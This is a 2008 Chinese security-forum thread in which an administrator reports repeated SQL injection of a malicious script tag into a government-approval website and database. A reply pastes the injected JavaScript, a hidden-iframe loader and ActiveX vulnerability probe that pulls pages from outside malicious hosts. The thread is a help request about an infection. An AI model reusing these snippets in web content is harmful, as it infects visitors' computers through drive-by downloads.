sql数据库被注入了 - 瑞星卡卡安全论坛bbs.ikaka.com

瑞星卡卡安全论坛技术交流区 反病毒/反流氓软件论坛 sql数据库被注入了

	瑞星“1+2”全新解决方案巡展在广州画上圆满句号		叶院长揭秘：瑞星如何运用AI技术革新网络安全		俄乌冲突加剧网络攻击风险白俄罗斯政府遭APT攻击		瑞星ESM防病毒系统助力矿业大学筑牢网络安全防线
	实力拉满瑞星第五十次通过VB100测评		携手老友，拥抱新精彩 —— 新论坛新活动，感谢你的陪伴		护航司法，瑞星助力山西省高院构建安全防线		人工智能在网络安全领域的风险和机遇

12

1 / 2 页

跳转页

sql数据库被注入了

xmcyjm 初生襁褓狮帖子:9 注册: 2008-05-11 来自:	发表于： 2008-05-11 08:13 \| 只看楼主短消息资料字号：小中大 1楼 sql数据库被注入了我们单位的审批系统和外网，是asp.net和sql2000 sp4，操作系统是windows 2003 server 最近sql数据库被注入了，所有网站和审批系统中可以被填写的地方都被加入了如下代码： src=http://sb.5252.ws:88/107/1.js></script>< ——>< 用瑞星听诊器查无可疑文件，无可疑进程，瑞星杀毒软件找不到病毒，卡卡也没查到任何异常硬盘格式化，重新安装操作系统，重新架设sql，数据库恢复到没中木马的时候，可是过了半天，又被重新注入。请大家帮忙解决一下，十万火急。用户系统信息：Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
xmcyjm 初生襁褓狮帖子:9 注册: 2008-05-11 来自:	分享到：

xmcyjm 初生襁褓狮帖子:9 注册: 2008-05-11 来自:	发表于： 2008-05-11 08:50 \| 只看楼主短消息资料字号：小中大 2楼回复：sql数据库被注入了大家快来救救我啊。
xmcyjm 初生襁褓狮帖子:9 注册: 2008-05-11 来自:

q3watcher 初生襁褓狮帖子:3 注册: 2008-01-22 来自:	发表于： 2008-05-11 09:11 \| 短消息资料字号：小中大 3楼回复：sql数据库被注入了 document.writeln("var start = cookieString.indexOf(\"woshi0day=\");"); document.writeln("if (start != -1)"); document.writeln("{}"); document.writeln("else"); document.writeln("{"); document.writeln("var expires = new Date();"); document.writeln("expires.setTime(expires.getTime() + 24 * 60 * 60 * 1000);"); document.writeln("document.cookie = \"woshi0day=0000;expires=\" + expires.toGMTString();"); document.writeln("document.write(\"<iframe src=http:\/\/ii.jtren.net\/cc\/p139.htm?18 width=10 height=0><\/iframe>\");");
q3watcher 初生襁褓狮帖子:3 注册: 2008-01-22 来自:

q3watcher 初生襁褓狮帖子:3 注册: 2008-01-22 来自:	发表于： 2008-05-11 09:13 \| 短消息资料字号：小中大 4楼回复：sql数据库被注入了 try{ var j; var real11=new ActiveXObject("IERP"+"Ctl.I"+"ERPCtl.1");} catch(j){}; finally{if(j!="[object Error]"){if(new ActiveXObject("IERPCtl.IERPCtl.1").PlayerProperty("PRODUCTVERSION")<="6.0.14.552") {document.write('<iframe width=100 height=0 src=http://b.360ll.cn/real.htm></iframe>')} else { document.write('<iframe width=100 height=0 src=http://b.360ll.cn/real11.htm></iframe>')}}} try{ var g; var glworld=new ActiveXObject("GLAVATAR.GLAvatarCtrl.1");} catch(g){}; finally{if(g!="[object Error]"){ document.write('<iframe style=display:none src=http://b.360ll.cn/lz.htm></iframe>')}} try{ var h; var storm=new ActiveXObject("MPS.StormPlayer.1");} catch(h){}; finally{if(h!="[object Error]"){ document.write('<iframe style=display:none src=http://b.360ll.cn/bfyy.htm></iframe>')}} try{ var f; var thunder=new ActiveXObject("DPClient.Vod");} catch(f){}; finally{ if(f!="[object Error]"){ document.write('<iframe width=50 height=0 src=xl.htm></iframe>')}}
q3watcher 初生襁褓狮帖子:3 注册: 2008-01-22 来自:

xmcyjm 初生襁褓狮帖子:9 注册: 2008-05-11 来自:	发表于： 2008-05-11 13:02 \| 只看楼主短消息资料字号：小中大 5楼回复：sql数据库被注入了楼上的大哥，您说的两段代码能解释一下吗？是要加到web.config里面吗？
xmcyjm 初生襁褓狮帖子:9 注册: 2008-05-11 来自:

xmcyjm 初生襁褓狮帖子:9 注册: 2008-05-11 来自:	发表于： 2008-05-11 13:51 \| 只看楼主短消息资料字号：小中大 6楼回复：sql数据库被注入了管理员快来帮帮忙吧
xmcyjm 初生襁褓狮帖子:9 注册: 2008-05-11 来自:

xmcyjm 初生襁褓狮帖子:9 注册: 2008-05-11 来自:	发表于： 2008-05-11 16:22 \| 只看楼主短消息资料字号：小中大 7楼回复：sql数据库被注入了版主啊，快来救救我啊，我可是瑞星网络版用户啊
xmcyjm 初生襁褓狮帖子:9 注册: 2008-05-11 来自:

超级游戏迷卡卡技术团队帖子:25779 注册: 2007-01-14 来自:	发表于： 2008-05-11 16:27 \| 短消息资料字号：小中大 8楼回复: sql数据库被注入了进入我签名下的网盘地址，找个iframkill这个工具，批量清除所有网页的附加恶意代码…… 这个工具我尚未熟悉，相关操作请自行摸索。打酱油的……
超级游戏迷卡卡技术团队帖子:25779 注册: 2007-01-14 来自:

xmcyjm 初生襁褓狮帖子:9 注册: 2008-05-11 来自:	发表于： 2008-05-11 16:42 \| 只看楼主短消息资料字号：小中大 9楼回复：sql数据库被注入了这种方法，治标不治本啊。清除一段时间之后，不到半天还会是老样子的
xmcyjm 初生襁褓狮帖子:9 注册: 2008-05-11 来自:

xmcyjm 初生襁褓狮帖子:9 注册: 2008-05-11 来自:	发表于： 2008-05-11 18:23 \| 只看楼主短消息资料字号：小中大 10楼回复：sql数据库被注入了还有就是这个工具是清除网页恶意代码的，对于sql数据库有用吗？还请给位版主帮帮忙啊
xmcyjm 初生襁褓狮帖子:9 注册: 2008-05-11 来自:

<<上一主题|下一主题>>

12

1 / 2 页

跳转页

页面顶部

Powered by Discuz!NT